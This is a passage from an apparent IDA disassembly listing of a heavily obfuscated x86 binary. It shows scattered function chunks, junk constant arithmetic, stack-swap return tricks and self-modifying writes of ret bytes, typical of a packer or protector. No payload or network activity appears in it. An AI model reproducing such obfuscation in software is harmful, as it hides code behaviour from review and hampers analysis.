		call	sub_44E2A4

locret_4501EA:				; CODE XREF: sub_45A078+Ej
		retn
sub_4501CC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4501EB:				; CODE XREF: sub_43CCD0+13BBAj
		jmp	loc_442ED3
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_4501F0:				; CODE XREF: sub_44DD31-EAFEj
		jmp	nullsub_121
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4501F5:				; CODE XREF: sub_43CCD0+B1ABj
					; sub_43CCD0:loc_44A3DDj
		push	offset sub_44D59D
		jmp	loc_43C956
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_4501FF:				; CODE XREF: sub_43D023+163E5j
		shr	esi, 1Ah
		rol	edi, 2
		jmp	loc_44266B
; END OF FUNCTION CHUNK	FOR sub_43D023
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_45020A:				; CODE XREF: sub_440C94:loc_451DEAj
		popf

loc_45020B:				; CODE XREF: k2vbe3.d:loc_443C7Bj
		mov	edi, [esi]
		add	esi, edi
		push	ebp
		add	eax, 9D4CC827h
		jmp	loc_44FFBE
; ---------------------------------------------------------------------------

loc_45021B:				; CODE XREF: sub_440C94+F33Aj
		push	offset loc_440A32
		jmp	loc_4541E2
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_450225:				; CODE XREF: sub_44E481-8FDEj
		push	offset sub_43E470

loc_45022A:				; CODE XREF: k2vbe3.d:loc_43E1A8j
		jmp	loc_4514D8
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_45022F:				; CODE XREF: sub_4597AE:loc_451568j
		xchg	edx, [esp+0]
		mov	ebp, esp
		push	eax
		push	0EB66E8B9h
		pop	eax
		add	eax, 0E0839A5h
		or	eax, 0F1CC7DB8h
		jmp	loc_45A741
; END OF FUNCTION CHUNK	FOR sub_4597AE

; =============== S U B	R O U T	I N E =======================================



sub_45024C	proc near		; DATA XREF: sub_454BCE-15C50o

; FUNCTION CHUNK AT 00444892 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DA70 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F4C SIZE 00000014 BYTES

		mov	eax, [esp+0]
		push	edx
		call	sub_443A95
		mov	eax, 9E471775h
		call	sub_4553CC
		jmp	loc_44DA70
sub_45024C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE0A

loc_450264:				; CODE XREF: sub_43FE0A:loc_441FE1j
					; sub_4410AE:loc_442C79j
		xor	[ebp-8], eax
		mov	eax, [ebp-8]
		shl	eax, 0Fh
		push	offset sub_45C249
		jmp	nullsub_131
; END OF FUNCTION CHUNK	FOR sub_43FE0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45451C

loc_450277:				; CODE XREF: sub_45451C-167Ej
		pop	esi
		or	esi, 0AE68F6A2h
		rol	esi, 16h
		sub	esi, 29F6E04Fh
		jmp	loc_45B301
; END OF FUNCTION CHUNK	FOR sub_45451C
; ---------------------------------------------------------------------------

loc_45028C:				; CODE XREF: k2vbe3.d:loc_454F07j
		jnz	loc_43F62D
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_450292:				; CODE XREF: sub_455BEA+2C3j
		jmp	loc_455A64
; END OF FUNCTION CHUNK	FOR sub_455BEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_450297:				; CODE XREF: sub_4553CC-12AFAj
		jmp	nullsub_186
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
		rol	edi, 1Bh
		jmp	loc_43F627
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_4502A4:				; CODE XREF: sub_440CEA+124D5j
		jz	nullsub_348
		jmp	loc_440A26
; END OF FUNCTION CHUNK	FOR sub_440CEA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_270. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459216

loc_4502B0:				; CODE XREF: sub_459216-F70j
		jmp	loc_4539D2
; END OF FUNCTION CHUNK	FOR sub_459216
; ---------------------------------------------------------------------------

loc_4502B5:				; CODE XREF: k2vbe3.d:0044EA0Fj
		jmp	loc_45A49B

; =============== S U B	R O U T	I N E =======================================



sub_4502BA	proc near		; CODE XREF: sub_44C74D+5p
					; k2vbe3.d:0044E32Fj

; FUNCTION CHUNK AT 004443C4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045AF76 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		nop
		push	0A7681F97h
		pop	eax
		jmp	loc_45AF76
sub_4502BA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_4502CA:				; CODE XREF: sub_457D4B-C547j
		jz	loc_45BA96
		jmp	loc_454AA1
; END OF FUNCTION CHUNK	FOR sub_457D4B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	0D026E6DEh
		test	ebx, ebp
		jmp	loc_44CD68
; ---------------------------------------------------------------------------
		push	429A3FCBh
		pop	edx
		sub	edx, 0BA192CAAh
		xor	edx, ds:4000F1h
		jmp	loc_440485
; ---------------------------------------------------------------------------

loc_4502F9:				; CODE XREF: k2vbe3.d:00459002j
		pop	esi
		rol	esi, 18h
		sub	esi, 7363CA75h
		rol	esi, 0Bh
		add	esi, 0FFD05A14h
		xchg	esi, [esp]
		jmp	sub_43C04E
; ---------------------------------------------------------------------------

locret_450314:				; CODE XREF: k2vbe3.d:loc_459ED7j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_450315:				; CODE XREF: sub_45BE94-314Aj
		jmp	loc_44BA7B
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF34

loc_45031A:				; CODE XREF: sub_44FF34+570Bj
		jo	loc_44F459
		sbb	eax, edi
		pushf
		xchg	esi, [ecx]
		jmp	loc_4520B0
; END OF FUNCTION CHUNK	FOR sub_44FF34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_45032A:				; CODE XREF: sub_446258:loc_455521j
		push	ecx
		mov	esp, ebp

loc_45032D:				; CODE XREF: k2vbe3.d:0043E9E4j
		call	sub_45451C

loc_450332:				; CODE XREF: sub_43DEBE:loc_44C44Ej
					; sub_440CEA+D210j
		jmp	loc_44ACB4
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------

loc_450337:				; CODE XREF: k2vbe3.d:00454C46j
		call	sub_444FB1
		mov	eax, 1C5E06BAh
		push	edx
		push	25F965Ah
		pop	edx
		and	edx, 0B88EFC2h
		or	edx, 0E0A061FEh
		jmp	loc_4589B5

; =============== S U B	R O U T	I N E =======================================



sub_450359	proc near		; CODE XREF: sub_456666:loc_451DCCp
					; k2vbe3.d:00457628j

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044A71F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CEC9 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004572CF SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045A4DE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045ACD9 SIZE 0000000B BYTES

		xchg	ecx, [esp+0]

loc_45035C:				; CODE XREF: sub_4580DF:loc_45BE8Aj
		pop	ecx
		jnz	loc_45A4DE
		test	byte ptr [ebp-8], 2
		jz	loc_44555B
		call	sub_4535BC

loc_450372:				; CODE XREF: sub_444BD5+1775Dj
		jmp	loc_45ACD9
sub_450359	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_450377:				; CODE XREF: sub_43E135+3EDAj
		jmp	loc_43F547
; END OF FUNCTION CHUNK	FOR sub_43E135
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E66

loc_45037C:				; CODE XREF: sub_441E66+11201j
		popf
		xchg	esi, [esp-4+arg_0]
		jmp	sub_4414DA
; END OF FUNCTION CHUNK	FOR sub_441E66
; ---------------------------------------------------------------------------

loc_450385:				; CODE XREF: k2vbe3.d:0044CA89j
					; k2vbe3.d:0044CAA1j
		and	ecx, 74318518h
		sub	ecx, 0C26C0E01h
		add	ecx, 928078BEh
		xchg	ecx, [esp]
		jmp	loc_44D0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_45039F:				; CODE XREF: sub_442DF0+B7C6j
		cmp	ds:dword_441228, 0
		jnz	loc_440599
		call	sub_44D594
		mov	edx, 0E5254649h
		call	sub_4432B0
		call	sub_4514E2

loc_4503C0:				; CODE XREF: sub_44662B-720Ej
		jmp	loc_4408A3
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_4503C5:				; CODE XREF: sub_446478-35C2j
		cdq
		rol	ebp, 2
		and	eax, esi

loc_4503CB:				; CODE XREF: sub_446478:loc_44202Cj
		and	eax, 0F2B127A9h
		jmp	loc_456ED5
; END OF FUNCTION CHUNK	FOR sub_446478

; =============== S U B	R O U T	I N E =======================================



sub_4503D6	proc near		; CODE XREF: k2vbe3.d:004453DBj
					; sub_445243+75CCp

; FUNCTION CHUNK AT 0045B894 SIZE 00000010 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebx
		mov	ebx, ecx
		jmp	loc_45B894
sub_4503D6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4503E2:				; CODE XREF: k2vbe3.d:loc_44DBFDj
		mov	[ebx], edx
		jmp	loc_44BD52
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_108. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4503EA:				; CODE XREF: k2vbe3.d:0045900Dj
		jmp	loc_44CD02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_4503EF:				; CODE XREF: sub_4426DF+E78Ej
		jmp	loc_45635C
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E5F

loc_4503F4:				; CODE XREF: sub_449E5F+6j
		push	offset sub_45482D
		jmp	nullsub_101
; END OF FUNCTION CHUNK	FOR sub_449E5F
; ---------------------------------------------------------------------------

loc_4503FE:				; CODE XREF: k2vbe3.d:loc_43E020j
		test	al, al
		jz	loc_44EA08
		jmp	loc_450E73
; ---------------------------------------------------------------------------

loc_45040B:				; DATA XREF: sub_440E8E:loc_44FE93o
		movzx	edx, byte ptr [edx]
		or	eax, edx
		jmp	loc_44A2C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_450415:				; CODE XREF: sub_456666:loc_444CFBj
		cmp	dword ptr [ebp-1Ch], 0Fh
		jnz	loc_451DCC
		mov	eax, [ebp-1Ch]
		jmp	loc_444EBF
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_450427:				; CODE XREF: sub_44D2F1:loc_44FD5Bj
		sbb	eax, 50159007h
		ror	ecx, 0Ah

loc_450430:				; CODE XREF: k2vbe3.d:loc_454D7Cj
		push	ebx
		push	1C8CAB3h
		pop	ebx
		xor	ebx, 37BA50EFh
		and	ebx, 718604E8h
		jmp	loc_449AAB
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_450448:				; CODE XREF: sub_45A9B3-7793j
		push	655766FCh
		jmp	loc_4589AA
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_450453	proc near		; CODE XREF: k2vbe3.d:00448D1Bj
					; k2vbe3.d:0045B40Dp
		xchg	esi, [esp+0]
		pop	esi
		mov	ds:dword_41E14C, eax
		lea	eax, nullsub_227
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_227
sub_450453	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45046B:				; CODE XREF: k2vbe3.d:0044DD90j
		mov	eax, [esp]
		push	edx
		push	offset loc_43E619
		jmp	locret_45A73A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_450479:				; CODE XREF: sub_43C3A9:loc_449531j
		rol	eax, 12h
		xor	eax, 91A55B5Ch
		add	eax, ebp
		add	eax, 0B6172E6Bh
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_45048A:				; CODE XREF: sub_4529E2+4909j
		mov	eax, [eax]
		push	offset loc_441898
		jmp	nullsub_238
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------

loc_450496:				; CODE XREF: k2vbe3.d:loc_44B354j
		sub	ebx, 0A7F70C6Eh
		jmp	loc_4521A3
; ---------------------------------------------------------------------------
		add	ebx, 5BD60D63h
		mov	ebp, 0DE064437h
		jmp	sub_457DCA
; ---------------------------------------------------------------------------
		mov	ds:dword_41E148, eax
		lea	eax, nullsub_494
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_494
; ---------------------------------------------------------------------------
		push	ecx
		jmp	loc_43FA3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44416D

loc_4504CB:				; CODE XREF: sub_44416D:loc_44D409j
		pop	ecx
		mov	[ebp-20h], eax
		jmp	loc_44A3CE
; ---------------------------------------------------------------------------

loc_4504D4:				; CODE XREF: sub_44416D:loc_44555Bj
		test	byte ptr [ebp-7], 8
		jz	loc_44BCC2
		push	ebp
		mov	eax, [ebp-20h]

loc_4504E2:				; CODE XREF: sub_43FF59+36DAj
		push	offset loc_45943C
		jmp	loc_44B1E3
; END OF FUNCTION CHUNK	FOR sub_44416D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4504EC:				; CODE XREF: sub_45A323:loc_442855j
		xchg	edx, edi
		jmp	loc_45ABFB
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_4504F3	proc near		; CODE XREF: sub_443E73-17E1p
					; k2vbe3.d:00447B39j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C19A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043C738 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449176 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B5E9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044F988 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045231A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457233 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045BD4E SIZE 0000000E BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ecx
		mov	ecx, edx
		call	sub_4497D1

loc_4504FF:				; CODE XREF: sub_45530F-16D54j
		jb	loc_457233

loc_450505:				; CODE XREF: k2vbe3.d:loc_43D1BDj
		mov	eax, [esp+0]
		push	esi
		mov	esi, edi
		xchg	esi, [esp+4+var_4]
		push	29EF5A77h
		pop	edi
		and	edi, 0F3F7D73Eh
		jmp	loc_44F988
sub_4504F3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45051F	proc near		; CODE XREF: k2vbe3.d:0044F9F3j
					; sub_44809D+D513p

; FUNCTION CHUNK AT 00443381 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00457C85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BB62 SIZE 0000000E BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ecx, 54F6DD2Eh
		mov	ecx, [ecx]
		mov	eax, [ebp-24h]
		mov	dx, [eax+2]
		mov	eax, [ebp-14h]
		jmp	loc_443381
sub_45051F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45053A:				; CODE XREF: k2vbe3.d:0043E623j
		add	ecx, 0BEE0E45Ch
		xchg	ecx, [esp]
		jmp	loc_44A346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_450548:				; CODE XREF: sub_44D0D5:loc_442DDAj
		and	edi, 196BDA67h
		sub	edi, 0B86EF51Ch
		add	edi, 0A05004AFh
		xchg	edi, [esp+0]
		jmp	sub_43C82E
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_450562:				; CODE XREF: k2vbe3.d:004527E7j
		jnz	loc_45BA12
		jmp	loc_44AE07
; ---------------------------------------------------------------------------
		and	esi, 69E04F9h
		jmp	loc_4482F1
; ---------------------------------------------------------------------------
		push	9263D6CBh
		adc	ecx, 5EDA5BD6h
		jmp	sub_43F0FF
; ---------------------------------------------------------------------------

loc_450588:				; CODE XREF: k2vbe3.d:00441702j
		cmp	edi, 3EED77E6h
		jmp	loc_4530AC
; ---------------------------------------------------------------------------

loc_450593:				; CODE XREF: k2vbe3.d:0043DD7Ej
		jge	loc_4539F5
		push	0DE1EA17Ch
		xchg	edx, [ebx]
		jmp	loc_452A3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_4505A5:				; CODE XREF: sub_44BDBB:loc_458D5Fj
		push	offset sub_45825C
		jmp	nullsub_296
; END OF FUNCTION CHUNK	FOR sub_44BDBB

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_4505AF	proc near		; CODE XREF: sub_454BCE:loc_44DC65j
		retn
sub_4505AF	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45496E

loc_4505B0:				; CODE XREF: sub_45496E-2A89j
		jmp	loc_450B57
; END OF FUNCTION CHUNK	FOR sub_45496E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4444EC

loc_4505B5:				; CODE XREF: sub_4444EC+BA8Cj
		jmp	nullsub_227
; END OF FUNCTION CHUNK	FOR sub_4444EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_4505BA:				; CODE XREF: sub_44A6BD-D0D6j
		jmp	loc_45A952
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
		cmp	esi, edx
		jmp	loc_4465D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441C24

loc_4505C6:				; CODE XREF: sub_441C24+11j
		push	eax
		call	sub_457960

loc_4505CC:				; CODE XREF: k2vbe3.d:00444710j
		jmp	nullsub_103
; END OF FUNCTION CHUNK	FOR sub_441C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_4505D1:				; CODE XREF: sub_43DEBE+6848j
		jmp	loc_453EBB
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------

loc_4505D6:				; CODE XREF: k2vbe3.d:0044D607j
		dec	dword ptr [ebp-24h]
		jnz	loc_458362
		jmp	loc_452C93
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597E6

loc_4505E4:				; CODE XREF: sub_4597E6:loc_444FDEj
		rol	eax, 0Bh
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_4597E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EBB

loc_4505E9:				; CODE XREF: sub_454EBB+1Dj
		jmp	loc_453D5B
; END OF FUNCTION CHUNK	FOR sub_454EBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_4505EE:				; CODE XREF: sub_4580DF-352Fj
		jmp	nullsub_427
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_4505F3:				; CODE XREF: sub_456541-1A41j
		jmp	nullsub_212
; END OF FUNCTION CHUNK	FOR sub_456541

; =============== S U B	R O U T	I N E =======================================



sub_4505F8	proc near		; CODE XREF: sub_4512B9-ADE6p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D080 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043EAFE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043ECB7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043FA74 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444E6B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00445551 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DEFF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044EE3F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450C53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457F13 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00458AAF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045C1A0 SIZE 00000005 BYTES

		push	ebx
		jmp	loc_458AAF
sub_4505F8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D612

loc_4505FE:				; CODE XREF: sub_43D612:loc_445640j
		or	esi, 984A2796h
		xor	esi, 0F2713831h
		add	esi, 0F6269252h
		mov	[esi], eax
		jmp	loc_456A7D
; END OF FUNCTION CHUNK	FOR sub_43D612
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443C0D

loc_450617:				; CODE XREF: sub_443C0D+9j
		mov	eax, [ebp+var_4]
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_0]
		test	byte ptr [eax-7], 10h
		jmp	loc_45541E
; END OF FUNCTION CHUNK	FOR sub_443C0D
; ---------------------------------------------------------------------------

loc_450629:				; CODE XREF: k2vbe3.d:0044773Bj
		and	eax, 286C1528h
		adc	esi, 0EEA999CDh
		mov	edi, ecx
		cmp	ebx, 0C93BCD31h
		jmp	loc_43EAC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_450642:				; CODE XREF: sub_44BB73-E8CDj
		jz	loc_443408
		jmp	loc_456D10
; END OF FUNCTION CHUNK	FOR sub_44BB73

; =============== S U B	R O U T	I N E =======================================



sub_45064D	proc near		; CODE XREF: sub_44B94B:loc_44778Ep
					; k2vbe3.d:00458CB1j

; FUNCTION CHUNK AT 00445EA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B996 SIZE 0000000B BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, 1C7A16C0h
		cmp	dword ptr [eax], 47424454h
		jz	loc_44DE55
		jmp	loc_445EA6
sub_45064D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CBF8

loc_450668:				; CODE XREF: sub_44CBF8:loc_44CC03j
		xor	eax, 7F00D122h
		add	eax, 0F9270B2Eh
		xchg	eax, [esp+0]
		jmp	sub_44A79B
; END OF FUNCTION CHUNK	FOR sub_44CBF8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_45067C:				; CODE XREF: sub_443A30:loc_44F8DCj
		pop	edx
		xchg	edi, [esp+0]
		mov	ebp, edi
		call	sub_443940

loc_450687:				; CODE XREF: k2vbe3.d:0044C1B7j
					; DATA XREF: k2vbe3.d:0044C1ADo
		popf
		xchg	esi, [esp-0Ch+arg_8]
		jmp	sub_44BA05
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442CA7

loc_450690:				; CODE XREF: sub_442CA7:loc_44BDACj
		xchg	ecx, [esp-4+arg_0]
		jmp	sub_43C82E
; END OF FUNCTION CHUNK	FOR sub_442CA7
; ---------------------------------------------------------------------------

loc_450698:				; DATA XREF: sub_44AA71+1o
		mov	eax, [esp]
		push	offset sub_45BB4D
; START	OF FUNCTION CHUNK FOR sub_442475

loc_4506A0:				; CODE XREF: sub_442475+A538j
		jmp	loc_44F895
; END OF FUNCTION CHUNK	FOR sub_442475
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440B4F

loc_4506A5:				; CODE XREF: sub_440B4F+F3Dj
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_440B4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A888

loc_4506AB:				; CODE XREF: sub_44A888+9j
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_44A888
; ---------------------------------------------------------------------------
		cmc
		inc	esp
		xor	ch, ah
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_4506B4:				; CODE XREF: sub_45A323+FF2j
		jmp	loc_44F905
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_4506B9:				; CODE XREF: sub_4553CC-303j
		jmp	loc_44C4E4
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_4506BE:				; CODE XREF: sub_45C041-9F37j
		jmp	loc_44ACAA
; END OF FUNCTION CHUNK	FOR sub_45C041

; =============== S U B	R O U T	I N E =======================================



sub_4506C3	proc near		; CODE XREF: .text:00404516p
					; sub_408DA0+15p
					; DATA XREF: ...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C9C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D1E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E290 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444349 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044643F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448F2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449FD0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D737 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044F0FE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F72C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00452602 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004562C5 SIZE 0000000B BYTES

		jns	loc_43C9C1
		mov	eax, ds:dword_455820
		jmp	loc_44F0FE
sub_4506C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_4506D4:				; CODE XREF: sub_43FCA0+FEB5j
					; DATA XREF: sub_455A4F-14E7o
		add	ebx, 8FB5DEC8h
		xchg	ebx, [esp-8+arg_4]
		jmp	loc_447BD7
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_273. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_4506E3:				; CODE XREF: sub_43D31B+152AEj
		jmp	loc_440FC9
; END OF FUNCTION CHUNK	FOR sub_43D31B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_463. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_4506E9:				; CODE XREF: k2vbe3.d:0045B230j
		retn
; ---------------------------------------------------------------------------

loc_4506EA:				; CODE XREF: k2vbe3.d:00453B0Ej
		xor	edx, 2218AB3Ah
		or	edx, 0DF4EC56Bh
		sub	edx, 0FD8B0D27h
		add	edx, 0FDFD29BCh
		jmp	loc_446B29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_450707:				; CODE XREF: sub_457D4B:loc_457CF6j
		jg	sub_44E2A4
		jmp	loc_44C2F2
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------

loc_450712:				; CODE XREF: k2vbe3.d:00453742j
		mov	ds:dword_41E15C, eax
		lea	eax, nullsub_225
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_225

; =============== S U B	R O U T	I N E =======================================



sub_450726	proc near		; CODE XREF: sub_406043+47p
					; sub_450726+5j
					; DATA XREF: ...
		call	sub_450740
		jmp	ds:off_41E160
sub_450726	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_450731:				; CODE XREF: sub_44DB59+AB66j
		jmp	loc_448E80
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_450736:				; CODE XREF: sub_449372+D17Ej
		jmp	loc_44F829
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449FE9

loc_45073B:				; CODE XREF: sub_449FE9+4j
		jmp	loc_4553C1
; END OF FUNCTION CHUNK	FOR sub_449FE9

; =============== S U B	R O U T	I N E =======================================



sub_450740	proc near		; CODE XREF: sub_450726p
					; sub_45381B:loc_453821j ...
